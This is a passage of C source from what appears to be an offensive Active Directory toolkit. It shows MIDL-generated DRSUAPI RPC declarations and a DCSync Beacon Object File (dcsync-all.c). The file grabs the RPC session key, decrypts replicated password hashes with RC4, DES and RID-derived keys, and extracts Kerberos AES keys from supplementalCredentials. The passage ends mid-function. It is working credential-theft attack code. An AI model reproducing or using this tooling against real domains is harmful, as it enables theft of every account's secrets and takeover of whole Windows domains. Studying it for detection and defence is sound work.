    UUID uuidHelperDest;
    /* [ref] */ DSNAME *pNC;
    } 	DRS_MSG_REPLICA_DEMOTIONREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0184
    {
    /* [case()] */ DRS_MSG_REPLICA_DEMOTIONREQ_V1 V1;
    } 	DRS_MSG_REPLICA_DEMOTIONREQ;

typedef /*  */ struct __MIDL_drsuapi_0185
    {
    DWORD dwOpError;
    } 	DRS_MSG_REPLICA_DEMOTIONREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0186
    {
    /* [case()] */ DRS_MSG_REPLICA_DEMOTIONREPLY_V1 V1;
    } 	DRS_MSG_REPLICA_DEMOTIONREPLY;

typedef /*  */ struct __MIDL_drsuapi_0187
    {
    DWORD dwOperations;
    UUID uuidHelperDest;
    /* [string] */ LPWSTR szScriptBase;
    } 	DRS_MSG_FINISH_DEMOTIONREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0188
    {
    /* [case()] */ DRS_MSG_FINISH_DEMOTIONREQ_V1 V1;
    } 	DRS_MSG_FINISH_DEMOTIONREQ;

typedef /*  */ struct __MIDL_drsuapi_0189
    {
    DWORD dwOperationsDone;
    DWORD dwOpFailed;
    DWORD dwOpError;
    } 	DRS_MSG_FINISH_DEMOTIONREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0190
    {
    /* [case()] */ DRS_MSG_FINISH_DEMOTIONREPLY_V1 V1;
    } 	DRS_MSG_FINISH_DEMOTIONREPLY;

typedef /*  */ struct __MIDL_drsuapi_0191
    {
    /* [string] */ const WCHAR *pwszCloneDCName;
    /* [string] */ const WCHAR *pwszSite;
    } 	DRS_MSG_ADDCLONEDCREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0192
    {
    /* [case()] */ DRS_MSG_ADDCLONEDCREQ_V1 V1;
    } 	DRS_MSG_ADDCLONEDCREQ;

typedef /*  */ struct __MIDL_drsuapi_0193
    {
    /* [string] */ WCHAR *pwszCloneDCName;
    /* [string] */ WCHAR *pwszSite;
    /* [range] */ DWORD cPasswordLength;
    /* [size_is] */ WCHAR *pwsNewDCAccountPassword;
    } 	DRS_MSG_ADDCLONEDCREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0194
    {
    /* [case()] */ DRS_MSG_ADDCLONEDCREPLY_V1 V1;
    } 	DRS_MSG_ADDCLONEDCREPLY;

typedef struct _DRS_MSG_WRITENGCKEYREQ_V1
    {
    /* [string] */ const WCHAR *pwszAccount;
    /* [range] */ DWORD cNgcKey;
    /* [size_is] */ UCHAR *pNgcKey;
    } 	DRS_MSG_WRITENGCKEYREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0195
    {
    /* [case()] */ DRS_MSG_WRITENGCKEYREQ_V1 V1;
    } 	DRS_MSG_WRITENGCKEYREQ;

typedef struct _DRS_MSG_WRITENGCKEYREPLY_V1
    {
    DWORD retVal;
    } 	DRS_MSG_WRITENGCKEYREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0196
    {
    /* [case()] */ DRS_MSG_WRITENGCKEYREPLY_V1 V1;
    } 	DRS_MSG_WRITENGCKEYREPLY;

typedef struct _DRS_MSG_READNGCKEYREQ_V1
    {
    /* [string] */ const WCHAR *pwszAccount;
    } 	DRS_MSG_READNGCKEYREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0197
    {
    /* [case()] */ DRS_MSG_READNGCKEYREQ_V1 V1;
    } 	DRS_MSG_READNGCKEYREQ;

typedef struct _DRS_MSG_READNGCKEYREPLY_V1
    {
    DWORD retVal;
    /* [range] */ DWORD cNgcKey;
    /* [size_is] */ UCHAR *pNgcKey;
    } 	DRS_MSG_READNGCKEYREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0198
    {
    /* [case()] */ DRS_MSG_READNGCKEYREPLY_V1 V1;
    } 	DRS_MSG_READNGCKEYREPLY;

ULONG IDL_DRSBind( 
    /* [in] */ handle_t rpc_handle,
    /* [unique][in] */ UUID *puuidClientDsa,
    /* [unique][in] */ DRS_EXTENSIONS *pextClient,
    /* [out] */ DRS_EXTENSIONS **ppextServer,
    /* [ref][out] */ DRS_HANDLE *phDrs);

ULONG IDL_DRSUnbind( 
    /* [ref][out][in] */ DRS_HANDLE *phDrs);

ULONG IDL_DRSReplicaSync( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwVersion,
    /* [switch_is][ref][in] */ DRS_MSG_REPSYNC *pmsgSync);

ULONG IDL_DRSGetNCChanges( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_GETCHGREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_GETCHGREPLY *pmsgOut);

ULONG IDL_DRSUpdateRefs( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwVersion,
    /* [switch_is][ref][in] */ DRS_MSG_UPDREFS *pmsgUpdRefs);

ULONG IDL_DRSReplicaAdd( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwVersion,
    /* [switch_is][ref][in] */ DRS_MSG_REPADD *pmsgAdd);

ULONG IDL_DRSReplicaDel( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwVersion,
    /* [switch_is][ref][in] */ DRS_MSG_REPDEL *pmsgDel);

ULONG IDL_DRSReplicaModify( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwVersion,
    /* [switch_is][ref][in] */ DRS_MSG_REPMOD *pmsgMod);

ULONG IDL_DRSVerifyNames( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_VERIFYREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_VERIFYREPLY *pmsgOut);

ULONG IDL_DRSGetMemberships( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_REVMEMB_REQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_REVMEMB_REPLY *pmsgOut);

ULONG IDL_DRSInterDomainMove( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_MOVEREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_MOVEREPLY *pmsgOut);

ULONG IDL_DRSGetNT4ChangeLog( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_NT4_CHGLOG_REQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_NT4_CHGLOG_REPLY *pmsgOut);

ULONG IDL_DRSCrackNames( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_CRACKREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_CRACKREPLY *pmsgOut);

ULONG IDL_DRSWriteSPN( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_SPNREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_SPNREPLY *pmsgOut);

ULONG IDL_DRSRemoveDsServer( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_RMSVRREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_RMSVRREPLY *pmsgOut);

ULONG IDL_DRSRemoveDsDomain( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_RMDMNREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_RMDMNREPLY *pmsgOut);

ULONG IDL_DRSDomainControllerInfo( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_DCINFOREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_DCINFOREPLY *pmsgOut);

ULONG IDL_DRSAddEntry( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_ADDENTRYREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_ADDENTRYREPLY *pmsgOut);

ULONG IDL_DRSExecuteKCC( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_KCC_EXECUTE *pmsgIn);

ULONG IDL_DRSGetReplInfo( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_GETREPLINFO_REQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_GETREPLINFO_REPLY *pmsgOut);

ULONG IDL_DRSAddSidHistory( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_ADDSIDREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_ADDSIDREPLY *pmsgOut);

ULONG IDL_DRSGetMemberships2( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_GETMEMBERSHIPS2_REQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_GETMEMBERSHIPS2_REPLY *pmsgOut);

ULONG IDL_DRSReplicaVerifyObjects( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwVersion,
    /* [switch_is][ref][in] */ DRS_MSG_REPVERIFYOBJ *pmsgVerify);

ULONG IDL_DRSGetObjectExistence( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_EXISTREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_EXISTREPLY *pmsgOut);

ULONG IDL_DRSQuerySitesByCost( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_QUERYSITESREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_QUERYSITESREPLY *pmsgOut);

ULONG IDL_DRSInitDemotion( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_INIT_DEMOTIONREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_INIT_DEMOTIONREPLY *pmsgOut);

ULONG IDL_DRSReplicaDemotion( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_REPLICA_DEMOTIONREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_REPLICA_DEMOTIONREPLY *pmsgOut);

ULONG IDL_DRSFinishDemotion( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_FINISH_DEMOTIONREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_FINISH_DEMOTIONREPLY *pmsgOut);

ULONG IDL_DRSAddCloneDC( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_ADDCLONEDCREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_ADDCLONEDCREPLY *pmsgOut);

ULONG IDL_DRSWriteNgcKey( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_WRITENGCKEYREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_WRITENGCKEYREPLY *pmsgOut);

ULONG IDL_DRSReadNgcKey( 
    /* [ref][in] */ DRS_HANDLE hDrs,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DRS_MSG_READNGCKEYREQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DRS_MSG_READNGCKEYREPLY *pmsgOut);



extern RPC_IF_HANDLE drsuapi_v4_0_c_ifspec;
extern RPC_IF_HANDLE drsuapi_v4_0_s_ifspec;
#endif /* __drsuapi_INTERFACE_DEFINED__ */

#ifndef __dsaop_INTERFACE_DEFINED__
#define __dsaop_INTERFACE_DEFINED__

/* interface dsaop */
/* [unique][version][uuid] */ 

typedef /*  */ struct __MIDL_dsaop_0001
    {
    DWORD Flags;
    /* [range] */ DWORD cbPassword;
    /* [size_is] */ BYTE *pbPassword;
    } 	DSA_MSG_EXECUTE_SCRIPT_REQ_V1;

typedef /* [switch_type] */ union __MIDL_dsaop_0002
    {
    /* [case()] */ DSA_MSG_EXECUTE_SCRIPT_REQ_V1 V1;
    } 	DSA_MSG_EXECUTE_SCRIPT_REQ;

typedef /*  */ struct __MIDL_dsaop_0003
    {
    DWORD dwOperationStatus;
    /* [string] */ LPWSTR pwErrMessage;
    } 	DSA_MSG_EXECUTE_SCRIPT_REPLY_V1;

typedef /* [switch_type] */ union __MIDL_dsaop_0004
    {
    /* [case()] */ DSA_MSG_EXECUTE_SCRIPT_REPLY_V1 V1;
    } 	DSA_MSG_EXECUTE_SCRIPT_REPLY;

typedef /*  */ struct __MIDL_dsaop_0005
    {
    DWORD Reserved;
    } 	DSA_MSG_PREPARE_SCRIPT_REQ_V1;

typedef /* [switch_type] */ union __MIDL_dsaop_0006
    {
    /* [case()] */ DSA_MSG_PREPARE_SCRIPT_REQ_V1 V1;
    } 	DSA_MSG_PREPARE_SCRIPT_REQ;

typedef /*  */ struct __MIDL_dsaop_0007
    {
    DWORD dwOperationStatus;
    /* [string] */ LPWSTR pwErrMessage;
    /* [range] */ DWORD cbPassword;
    /* [size_is] */ BYTE *pbPassword;
    /* [range] */ DWORD cbHashBody;
    /* [size_is] */ BYTE *pbHashBody;
    /* [range] */ DWORD cbHashSignature;
    /* [size_is] */ BYTE *pbHashSignature;
    } 	DSA_MSG_PREPARE_SCRIPT_REPLY_V1;

typedef /* [switch_type] */ union __MIDL_dsaop_0008
    {
    /* [case()] */ DSA_MSG_PREPARE_SCRIPT_REPLY_V1 V1;
    } 	DSA_MSG_PREPARE_SCRIPT_REPLY;

ULONG IDL_DSAPrepareScript( 
    /* [in] */ handle_t hRpc,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DSA_MSG_PREPARE_SCRIPT_REQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DSA_MSG_PREPARE_SCRIPT_REPLY *pmsgOut);

ULONG IDL_DSAExecuteScript( 
    /* [in] */ handle_t hRpc,
    /* [in] */ DWORD dwInVersion,
    /* [switch_is][ref][in] */ DSA_MSG_EXECUTE_SCRIPT_REQ *pmsgIn,
    /* [ref][out] */ DWORD *pdwOutVersion,
    /* [switch_is][ref][out] */ DSA_MSG_EXECUTE_SCRIPT_REPLY *pmsgOut);



extern RPC_IF_HANDLE dsaop_v1_0_c_ifspec;
extern RPC_IF_HANDLE dsaop_v1_0_s_ifspec;
#endif /* __dsaop_INTERFACE_DEFINED__ */

/* Additional Prototypes for ALL interfaces */

void __RPC_USER DRS_HANDLE_rundown( DRS_HANDLE );

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif




================================================
FILE: AD-BOF/DCSync-BOF/src/dcsync-all.c
================================================
#include "../_include/dcsync.h"
#include "../_include/beacon.h"

#include "../util/ldap_common.c"
#include "../util/ldap_syncall.c"


void BytesToHex(const BYTE* bytes, DWORD len, char* output) {
    const char* hexChars = "0123456789abcdef";
    for (DWORD i = 0; i < len; i++) {
        output[i * 2] = hexChars[(bytes[i] >> 4) & 0xF];
        output[i * 2 + 1] = hexChars[bytes[i] & 0xF];
    }
    output[len * 2] = '\0';
}

// Session key captured by callback - one-time copy only
static BYTE g_SessionKeyCopy[256] = {0};
static DWORD g_SessionKeyCopyLen = 0;
static volatile LONG g_SessionKeyCapturing = 0;

void RPC_ENTRY RpcSecurityCallback(void *Context) {
    // Atomic check-and-set: only one thread can pass this
    if (InterlockedCompareExchange(&g_SessionKeyCapturing, 1, 0) != 0) {
        return; // Another thread is already capturing or has captured
    }
    
    PCtxtHandle pSecurityContext = NULL;
    SecPkgContext_SessionKey sessionKey = {0, NULL};
    
    if (RPCRT4$I_RpcBindingInqSecurityContext(Context, (void**)&pSecurityContext) != RPC_S_OK || !pSecurityContext) {
        return;
    }
    
    if (SECUR32$QueryContextAttributesA(pSecurityContext, SECPKG_ATTR_SESSION_KEY, &sessionKey) == SEC_E_OK &&
        sessionKey.SessionKeyLength > 0 && sessionKey.SessionKeyLength <= 256 && sessionKey.SessionKey) {
        
        // Copy session key to static buffer
        MSVCRT$memcpy(g_SessionKeyCopy, sessionKey.SessionKey, sessionKey.SessionKeyLength);
        g_SessionKeyCopyLen = sessionKey.SessionKeyLength;
        
        SECUR32$FreeContextBuffer(sessionKey.SessionKey);
    }
}

BOOL DecryptWithSessionKey(
    const BYTE* encryptedData,
    DWORD encryptedLen,
    const BYTE* sessionKey,
    DWORD sessionKeyLen,
    BYTE* output,
    DWORD* outputLen
) {
    if (!encryptedData || !sessionKey || !output || encryptedLen < 20) {
        return FALSE;
    }
    
    const BYTE* salt = encryptedData;
    const BYTE* encPayload = encryptedData + 16;
    DWORD encPayloadLen = encryptedLen - 16;
    
    HCRYPTPROV hProv = 0;
    HCRYPTHASH hHash = 0;
    BYTE derivedKey[16];
    DWORD derivedKeyLen = 16;
    
    if (!ADVAPI32$CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT) ||
        !ADVAPI32$CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash)) {
        if (hProv) ADVAPI32$CryptReleaseContext(hProv, 0);
        return FALSE;
    }
    
    ADVAPI32$CryptHashData(hHash, sessionKey, sessionKeyLen, 0);
    ADVAPI32$CryptHashData(hHash, salt, 16, 0);
    
    if (!ADVAPI32$CryptGetHashParam(hHash, HP_HASHVAL, derivedKey, &derivedKeyLen, 0)) {
        ADVAPI32$CryptDestroyHash(hHash);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return FALSE;
    }
    
    ADVAPI32$CryptDestroyHash(hHash);
    ADVAPI32$CryptReleaseContext(hProv, 0);

    BYTE* tempOutput = (BYTE*)MSVCRT$malloc(encPayloadLen);
    if (!tempOutput) {
        return FALSE;
    }
    
    BOOL result = DecryptRC4WithRawKey(encPayload, encPayloadLen, derivedKey, 16, tempOutput);
    
    if (result && encPayloadLen > 4) {
            DWORD receivedChecksum = *(DWORD*)tempOutput;
            DWORD realDataLen = encPayloadLen - 4;
            BYTE* realData = tempOutput + 4;
            
            DWORD calculatedChecksum = 0xFFFFFFFF;  
            for (DWORD i = 0; i < realDataLen; i++) {
                DWORD byte = realData[i];
                calculatedChecksum = calculatedChecksum ^ byte;
                for (int j = 0; j < 8; j++) {
                    DWORD mask = -(calculatedChecksum & 1);
                    calculatedChecksum = (calculatedChecksum >> 1) ^ (0xEDB88320 & mask);
                }
            }
            calculatedChecksum = ~calculatedChecksum;
            
            if (receivedChecksum == calculatedChecksum && outputLen) {
                MSVCRT$memcpy(output, realData, realDataLen);
                *outputLen = realDataLen;
            } else {
                result = FALSE;
            }
    } else {
        result = FALSE;
    }
    
    MSVCRT$free(tempOutput);
    return result;
}

BOOL DecryptRC4WithRawKey(const BYTE* encData, DWORD encLen, const BYTE* key, DWORD keyLen, BYTE* output) {
    HCRYPTPROV hProv = 0;
    HCRYPTKEY hKey = 0;
    BOOL success = FALSE;
    
    if (!ADVAPI32$CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        return FALSE;
    }
    
    struct {
        BLOBHEADER hdr;
        DWORD keySize;
        BYTE keyBytes[16];
    } keyBlob;
    
    keyBlob.hdr.bType = PLAINTEXTKEYBLOB;
    keyBlob.hdr.bVersion = CUR_BLOB_VERSION;
    keyBlob.hdr.reserved = 0;
    keyBlob.hdr.aiKeyAlg = CALG_RC4;
    keyBlob.keySize = keyLen;
    MSVCRT$memcpy(keyBlob.keyBytes, key, keyLen);
    
    if (!ADVAPI32$CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(BLOBHEADER) + sizeof(DWORD) + keyLen, 0, 0, &hKey)) {
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return FALSE;
    }
    
    MSVCRT$memcpy(output, encData, encLen);
    
    DWORD dataLen = encLen;
    if (ADVAPI32$CryptDecrypt(hKey, 0, TRUE, 0, output, &dataLen)) {
        success = TRUE;
    }
    
    if (hKey) ADVAPI32$CryptDestroyKey(hKey);
    if (hProv) ADVAPI32$CryptReleaseContext(hProv, 0);
    
    return success;
}

BOOL DecryptRC4(const BYTE* encData, DWORD encLen, const BYTE* rid, BYTE* output) {
    HCRYPTPROV hProv = 0;
    HCRYPTHASH hHash = 0;
    HCRYPTKEY hKey = 0;
    BOOL success = FALSE;
    
    if (!ADVAPI32$CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        return FALSE;
    }
    
    if (!ADVAPI32$CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash)) {
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return FALSE;
    }
    
    if (!ADVAPI32$CryptHashData(hHash, rid, 4, 0)) {
        goto cleanup;
    }
    
    if (!ADVAPI32$CryptDeriveKey(hProv, CALG_RC4, hHash, 0, &hKey)) {
        goto cleanup;
    }
    
    MSVCRT$memcpy(output, encData, encLen);
    
    DWORD dataLen = encLen;
    if (ADVAPI32$CryptDecrypt(hKey, 0, TRUE, 0, output, &dataLen)) {
        success = TRUE;
    }
    
cleanup:
    if (hKey) ADVAPI32$CryptDestroyKey(hKey);
    if (hHash) ADVAPI32$CryptDestroyHash(hHash);
    if (hProv) ADVAPI32$CryptReleaseContext(hProv, 0);
    
    return success;
}

BOOL DecryptDESWithRid(const BYTE* encData, DWORD rid, BYTE* output) {
    return encData && output && ADVAPI32$SystemFunction025(encData, &rid, output) == 0;
}



DWORD HexToBinary(const BYTE* hexData, DWORD hexLen, BYTE* binaryOut) {
    if (!hexData || !binaryOut || hexLen < 2) return 0;
    
    DWORD binaryLen = 0;
    for (DWORD i = 0; i + 1 < hexLen; i += 2) {
        BYTE high = hexData[i];
        BYTE low = hexData[i + 1];
        
        // Convert ASCII hex char to nibble
        BYTE highNibble, lowNibble;
        
        if (high >= '0' && high <= '9') highNibble = high - '0';
        else if (high >= 'a' && high <= 'f') highNibble = high - 'a' + 10;
        else if (high >= 'A' && high <= 'F') highNibble = high - 'A' + 10;
        else break; // Invalid hex char
        
        if (low >= '0' && low <= '9') lowNibble = low - '0';
        else if (low >= 'a' && low <= 'f') lowNibble = low - 'a' + 10;
        else if (low >= 'A' && low <= 'F') lowNibble = low - 'A' + 10;
        else break; // Invalid hex char
        
        binaryOut[binaryLen++] = (highNibble << 4) | lowNibble;
    }
    
    return binaryLen;
}

// Parse Kerberos keys from supplementalCredentials
BOOL ParseKerberosKeys(const BYTE* propertyData, DWORD propertyLen, const char* samAccountName, const char* dcHostname, DWORD accountType, char* aes256Out, char* aes128Out) {
    if (!propertyData || !propertyLen || propertyLen < 32 || !samAccountName) return FALSE;
    
    // Skip 4-byte version prefix if present (00 00 00 01/02/03)
    const BYTE* structStart = propertyData;
    if (propertyData[0] == 0 && propertyData[1] == 0 && propertyData[2] == 0 && 
        propertyData[3] >= 1 && propertyData[3] <= 3) {
        structStart += 4;
    }
    
    // Read structure revision (big-endian USHORT at offset +0)
    USHORT revision = *(USHORT*)(structStart + 0);
    revision = ((revision & 0xFF) << 8) | ((revision >> 8) & 0xFF);
    BOOL isRevision0 = (revision == 0);
    
    // Read credential count (position varies by revision, big-endian)
    USHORT credCount = *(USHORT*)(structStart + (isRevision0 ? 2 : 4));
    credCount = ((credCount & 0xFF) << 8) | ((credCount >> 8) & 0xFF);
    if (credCount == 0 || credCount > 100) credCount = 3;
    
    // Read salt length (position varies by revision, big-endian)
    USHORT saltLen = *(USHORT*)(structStart + (isRevision0 ? 6 : 12));
    saltLen = ((saltLen & 0xFF) << 8) | ((saltLen >> 8) & 0xFF);
    if (saltLen == 0 || saltLen > 500) return FALSE;
    
    // Build search string to locate salt end based on account type
    // Trust accounts: uppercase domain FQDN + "krbtgt" + samAccountName (without $)
    // Computer accounts: "host<computername>.<domain>" (all lowercase)
    // User accounts: username as-is
    char searchName[256];
    DWORD searchLen = 0;
    DWORD nameLen = 0;
    while (samAccountName[nameLen] != '\0' && nameLen < 128) nameLen++;
    
    if (accountType == SAM_TRUST_ACCOUNT) {
        // Trust account: uppercase domain FQDN + "krbtgt" + samAccountName (without $)
        const char* domain = NULL;
        if (dcHostname) {
            for (DWORD i = 0; dcHostname[i] != '\0'; i++) {
                if (dcHostname[i] == '.') {
                    domain = &dcHostname[i + 1];
                    break;
                }
            }
        }
        if (domain && domain[0] != '\0') {
            // Add uppercase domain
            for (DWORD i = 0; domain[i] != '\0' && searchLen < 230; i++) {
                searchName[searchLen++] = domain[i];
            }
            // Append "krbtgt"
            if (searchLen + 6 < 255) {
                searchName[searchLen++] = 'k';
                searchName[searchLen++] = 'r';
                searchName[searchLen++] = 'b';
                searchName[searchLen++] = 't';
                searchName[searchLen++] = 'g';
                searchName[searchLen++] = 't';
            }
            // Append samAccountName (without trailing $)
            DWORD trustNameLen = nameLen;
            if (trustNameLen > 0 && samAccountName[trustNameLen - 1] == '$') trustNameLen--;
            for (DWORD i = 0; i < trustNameLen && searchLen < 255; i++) {
                searchName[searchLen++] = samAccountName[i];
            }
        }
    } else if (accountType == SAM_MACHINE_ACCOUNT) {
        // Computer account: uppercase FQDN + "host" + lowercase machine FQDN
        const char* domain = NULL;
        if (dcHostname) {
            for (DWORD i = 0; dcHostname[i] != '\0'; i++) {
                if (dcHostname[i] == '.') {
                    domain = &dcHostname[i + 1];
                    break;
                }
            }
        }
        
        if (domain && domain[0] != '\0') {
            // Add uppercase domain FQDN
            for (DWORD i = 0; domain[i] != '\0' && searchLen < 200; i++) {
                searchName[searchLen++] = domain[i];
            }
        }
        
        // Append "host"
        if (searchLen + 4 < 255) {
            searchName[searchLen++] = 'h';
            searchName[searchLen++] = 'o';
            searchName[searchLen++] = 's';
            searchName[searchLen++] = 't';
        }
        
        // Add lowercase computer name (without trailing $)
        DWORD compNameLen = nameLen;
        if (nameLen > 0 && samAccountName[nameLen - 1] == '$') compNameLen--;
        
        for (DWORD i = 0; i < compNameLen && searchLen < 254; i++) {
            searchName[searchLen++] = samAccountName[i];
        }
        
        if (domain && domain[0] != '\0') {
            searchName[searchLen++] = '.';
            for (DWORD i = 0; domain[i] != '\0' && searchLen < 255; i++) {
                searchName[searchLen++] = domain[i];
            }
        }
    } else {
        // User account (SAM_USER_OBJECT): uppercase FQDN + samAccountName
        /*
        // This is optional, causes issues with Administrator account. disabled for now
        const char* domain = NULL;
        if (dcHostname) {
            for (DWORD i = 0; dcHostname[i] != '\0'; i++) {
                if (dcHostname[i] == '.') {
                    domain = &dcHostname[i + 1];
                    break;
                }
            }
        }
        
        if (domain && domain[0] != '\0') {
            // Add uppercase domain FQDN
            for (DWORD i = 0; domain[i] != '\0' && searchLen < 200; i++) {
                char c = domain[i];
                if (c >= 'a' && c <= 'z') c -= ('a' - 'A');  // uppercase
                searchName[searchLen++] = c;
            }
        }
        */
        // Append samAccountName as-is (lowercase for users)
        for (DWORD i = 0; i < nameLen && searchLen < 255; i++) {
            searchName[searchLen++] = samAccountName[i];
        }
    }
    
    // Convert to UTF-16LE for searching
    BYTE searchUTF16[512];
    for (DWORD i = 0; i < searchLen; i++) {
        searchUTF16[i * 2] = searchName[i];
        searchUTF16[i * 2 + 1] = 0x00;
    }
    DWORD searchUTF16Len = searchLen * 2;
    
    // Find salt end by locating the search string
    DWORD descriptorStart = isRevision0 ? 32 : 28;
    DWORD matchOffset = 0xFFFFFFFF;
